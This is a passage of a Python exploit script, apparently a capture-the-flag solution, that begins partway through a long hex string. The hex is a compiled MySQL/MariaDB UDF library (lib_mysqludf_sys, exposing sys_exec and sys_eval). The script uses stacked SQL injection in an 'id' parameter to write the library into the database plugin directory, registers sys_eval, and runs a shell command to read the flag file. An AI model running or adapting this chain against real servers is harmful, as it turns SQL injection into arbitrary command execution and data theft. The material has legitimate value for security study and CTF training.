2E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0,21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'--+&page=1&limit=10"
rn = requests.get(next_url)

uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"#导入udf函数
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');--+&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)